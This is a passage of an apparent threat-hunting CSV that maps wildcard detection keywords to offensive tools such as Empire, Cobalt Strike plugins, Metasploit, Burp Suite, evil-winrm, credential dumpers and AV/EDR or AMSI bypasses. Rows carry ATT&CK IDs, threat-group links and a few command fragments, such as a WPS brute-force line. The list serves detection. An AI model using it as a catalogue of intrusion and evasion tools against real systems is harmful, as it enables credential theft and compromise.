SYSTEM impersonation*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-MS16032.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*BulletsPassView.exe*","offensive_tool_keyword","bulletpassview","BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. 
you can easily copy them to the clipboard or save them into text/html/csv/xml file.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/bullets_password_view.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*BulletsPassView.zip*","offensive_tool_keyword","bulletpassview","BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. you can easily copy them to the clipboard or save them into text/html/csv/xml file.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/bullets_password_view.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*BulletsPassView_setup.exe*","offensive_tool_keyword","bulletpassview","BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. you can easily copy them to the clipboard or save them into text/html/csv/xml file.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/bullets_password_view.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*BulletsPassView_x64.exe*","offensive_tool_keyword","bulletpassview","BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. 
you can easily copy them to the clipboard or save them into text/html/csv/xml file.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/bullets_password_view.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*bully wlan1mon -b * -c 9 -S -F -B -v 3*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*bunny.deb.parrot.sh/*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*bupload_raw*.dll*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","174","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" +"*burnett_top_1024.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Burp Suite*","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. 
and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*burp*PayloadParser.py*","offensive_tool_keyword","burpsuite","PayloadParser - Burp Suite NMap Parsing Interface in Python","T1583 - T1595 - T1190","TA0001 - TA0003 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/infodel/burp.extension-payloadparser","1","1","N/A","N/A","1","4","3","2013-03-15T20:41:45Z","2013-03-15T20:39:23Z" +"*burp*SQLMapper.xml*","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","142","40","2019-12-24T22:30:15Z","2015-04-19T03:38:34Z" +"*burp.extension-payloadparser*","offensive_tool_keyword","burpsuite","PayloadParser - Burp Suite NMap Parsing Interface in Python","T1583 - T1595 - T1190","TA0001 - TA0003 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/infodel/burp.extension-payloadparser","1","1","N/A","N/A","1","4","3","2013-03-15T20:41:45Z","2013-03-15T20:39:23Z" +"*burp_log_*.log*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*Burp_start.bat*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation 
tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" +"*Burp_start_en.bat*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" +"*burp2malleable.*","offensive_tool_keyword","cobaltstrike","Quick python utility I wrote to turn HTTP requests from burp suite into Cobalt Strike Malleable C2 profiles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CodeXTF2/Burp2Malleable","1","1","N/A","10","10","320","32","2023-04-06T15:24:12Z","2022-08-14T18:05:39Z" +"*burp-co2/out/artifacts*","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through 
the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","142","40","2019-12-24T22:30:15Z","2015-04-19T03:38:34Z" +"*BurpCO2Suite.xml*","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","142","40","2019-12-24T22:30:15Z","2015-04-19T03:38:34Z" +"*burpcollaborator.net*","offensive_tool_keyword","burpsuite","Burp Suite is a leading range of cybersecurity tools. brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. This tool is not free and open source","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*BurpFunctions.java*","offensive_tool_keyword","burpsuite","A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/nccgroup/BurpSuiteHTTPSmuggler","1","1","N/A","N/A","7","668","108","2019-05-04T06:15:42Z","2018-07-03T07:47:58Z" +"*burpitem.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*burplog.py*","offensive_tool_keyword","wfuzz","Web application 
fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*BurpShiroPassiveScan.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" +"*burpstate.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*Burpsuite*","offensive_tool_keyword","burpsuite","Burp Suite is a leading range of cybersecurity tools. brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. This tool is not free and open source","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*burpsuite*.exe*","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*burpsuite*.jar*","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. 
and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*burpsuite*.sh*","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*burpsuite*.zip*","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*BurpSuiteCn.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" +"*BurpSuiteHTTPSmuggler*","offensive_tool_keyword","burpsuite","A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/nccgroup/BurpSuiteHTTPSmuggler","1","1","N/A","N/A","7","668","108","2019-05-04T06:15:42Z","2018-07-03T07:47:58Z" 
+"*BurpSuite-SecretFinder*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","10","1526","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" +"*burp-vulners-scanner-*.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" +"*burp-xss-sql-plugin*","offensive_tool_keyword","burpsuite","find several bugbounty-worthy XSSes. OpenRedirects and SQLi.","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0008 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/attackercan/burp-xss-sql-plugin","1","1","N/A","N/A","1","44","12","2016-09-28T21:46:18Z","2016-08-17T14:05:24Z" +"*buster -e * -f john -l doe -b '****1989'*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*busterPayloads.txt*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*bWV0YXNwbG9pdA==*","offensive_tool_keyword","C2 related 
tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*byakugan/bin/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Bye_Explorer.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" +"*BYOVD_kill_av_edr.*","offensive_tool_keyword","BYOVD_kill_av_edr","BYOD to kill AV/EDR","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/BYOVD_kill_av_edr.c","1","1","N/A","10","3","229","42","2023-06-14T02:13:19Z","2023-01-15T22:37:34Z" +"*bypass_cmdinject*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bypass_powershell_protections*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Bypass-4MSI*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. 
Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" +"*bypass-amsi*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*BypassAV.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike plugin for quickly generating anti-kill executable files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/hack2fun/BypassAV","1","1","N/A","10","10","830","126","2020-07-19T15:46:54Z","2020-02-17T02:33:14Z" +"*bypass-classic.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*BypassCredGuard.*","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1558 - T1558.001 - T1055 - T1055.002","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/BypassCredGuard","1","1","N/A","10","3","277","50","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" +"*BypassCredGuard-master*","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1558 - T1558.001 - T1055 - T1055.002","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/BypassCredGuard","1","1","N/A","10","3","277","50","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" +"*BYPASS-DINVOKE*.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense 
Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*BYPASS-DINVOKE.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*BYPASS-DINVOKE_MANUAL_MAPPING.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*bypass-pipe.c*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 